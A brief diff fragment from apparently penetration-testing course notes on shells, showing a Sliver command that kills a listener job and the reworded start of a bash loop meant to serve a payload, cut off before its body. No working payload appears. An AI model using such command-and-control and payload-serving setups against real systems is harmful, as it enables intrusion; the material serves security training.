Ali-Mikael/Pen-testing/h6-shells.md

 sliver > jobs -k 3
 ```

-Create a script to act as the payload-server / listener:
+Create a script which will serve our payload:
 ```bash
 while true; do
 	(